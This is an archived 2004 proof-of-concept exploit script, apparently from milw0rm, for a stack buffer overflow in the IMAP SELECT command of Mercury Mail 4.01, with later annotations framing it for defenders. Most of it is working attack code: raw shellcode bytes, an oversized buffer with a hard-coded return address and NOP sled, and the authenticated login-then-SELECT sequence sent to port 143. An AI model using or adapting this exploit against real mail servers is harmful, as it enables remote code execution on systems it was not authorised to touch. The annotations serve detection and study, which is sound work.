
Mercury Mail 4.01 Pegasus IMAP Buffer Overflow Exploit





  2    #########################################################
  3    #                                                       #
  4    # Mercury Mail 4.01 (Pegasus) IMAP Buffer Overflow      #
  5    # Discovered by : Muts                                  #
  6    # Coded by : Muts                                       #
  7    # WWW.WHITEHAT.CO.IL                                    #
  8    # Plain vanilla stack overflow in the SELECT command    #
  9    #                                                       #
  10   #########################################################
  11
       # Historical (2004) proof-of-concept for a stack overflow in the IMAP
       # SELECT handler of Mercury Mail 4.01.  Written in Python 2 (print
       # statements).  Read it as a description of the attack traffic a
       # defender would see on port 143, not as a runnable tool: the
       # target, credentials and return address are all hard-coded below.
  12
  13   import struct
  14   import socket
  15   from time import sleep
  16
       # Plain TCP client socket; the IMAP session is sent in cleartext.
  17   s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
  18
  19   # Lame calc.exe shellcode - dont expect miracles!
       # The bytes below are opaque here; the only statement about their
       # behaviour is the author's comment above.  Treat them as a signature
       # sample, not as something verified by this file.
  20
  21   sc2   = "\xd9\xee\xd9\x74\x24\xf4\x5b\x31\xc9\xb1\x29\x81\x73\x17\xb1\x74"
  22   sc2   += "\x3f\x7c\x83\xeb\xfc\xe2\xf4\x4d\x9c\x69\x7c\xb1\x74\x6c\x29\xe7"
  23   sc2   += "\x23\xb4\x10\x95\x6c\xb4\x39\x8d\xff\x6b\x79\xc9\x75\xd5\xf7\xfb"
  24   sc2   += "\x6c\xb4\x26\x91\x75\xd4\x9f\x83\x3d\xb4\x48\x3a\x75\xd1\x4d\x4e"
  25   sc2   += "\x88\x0e\xbc\x1d\x4c\xdf\x08\xb6\xb5\xf0\x71\xb0\xb3\xd4\x8e\x8a"
  26   sc2   += "\x08\x1b\x68\xc4\x95\xb4\x26\x95\x75\xd4\x1a\x3a\x78\x74\xf7\xeb"
  27   sc2   += "\x68\x3e\x97\x3a\x70\xb4\x7d\x59\x9f\x3d\x4d\x71\x2b\x61\x21\xea"
  28   sc2   += "\xb6\x37\x7c\xef\x1e\x0f\x25\xd5\xff\x26\xf7\xea\x78\xb4\x27\xad"
  29   sc2   += "\xff\x24\xf7\xea\x7c\x6c\x14\x3f\x3a\x31\x90\x4e\xa2\xb6\xbb\x5a"
  30   sc2   += "\x6c\x6c\x14\x29\x8a\xb5\x72\x4e\xa2\xc0\xac\xe2\x1c\xcf\xf6\xb5"
  31   sc2   += "\x2b\xc0\xaa\xdb\x74\xc0\xac\x4e\xa4\x55\x7c\x59\x95\xc0\x83\x4e"
  32   sc2   += "\x17\x5e\x10\xd2\x5a\x5a\x04\xd4\x74\x3f\x7c"
  33
  34   #Change RET Address as needed
       # Payload layout as written: 260 bytes of 'A', one 32-bit little-endian
       # value packed with struct (the "RET address" the author says must be
       # adjusted per target), 32 bytes of 0x90, then sc2.  The total is
       # several hundred bytes, far beyond any legitimate mailbox name --
       # a SELECT argument of this length and byte content is the
       # observable anomaly for an IDS/IMAP-log rule.
  35   buffer = ’\x41’*260 + struct.pack(’<L’, 0x782f28f7)+ ’\x90’*32+sc2
  36
  37   print "\nSending evil buffer..."
       # Hard-coded RFC 1918 lab address; there is no argument parsing.
  38   s.connect((’192.168.1.167’,143))
       # The overflow is reached only after an IMAP LOGIN, i.e. this is an
       # authenticated (post-login) attack -- the script assumes an account
       # "ftp" with password "ftp" exists.  Mitigation on the server side is
       # the vendor fix plus not exposing IMAP with weak/default accounts.
  39   s.send(’a001 LOGIN ftp ftp’ + ’\r\n’)
       # Server responses are read but never checked; a failed LOGIN does not
       # stop the script from sending the SELECT anyway.
  40   data = s.recv(1024)
       # NOTE(review): no reason given for the pause; presumably just gives the
       # server time to finish the LOGIN -- unverified.
  41   sleep(3)
  42   s.send(’A001 SELECT ’ + buffer+’\r\n’)
  43   data = s.recv(1024)
  44   s.close()
  45   print "\nDone! "
  46
  47   # milw0rm.com [2004-11-29]



muts                                                                                     11/29/2004

				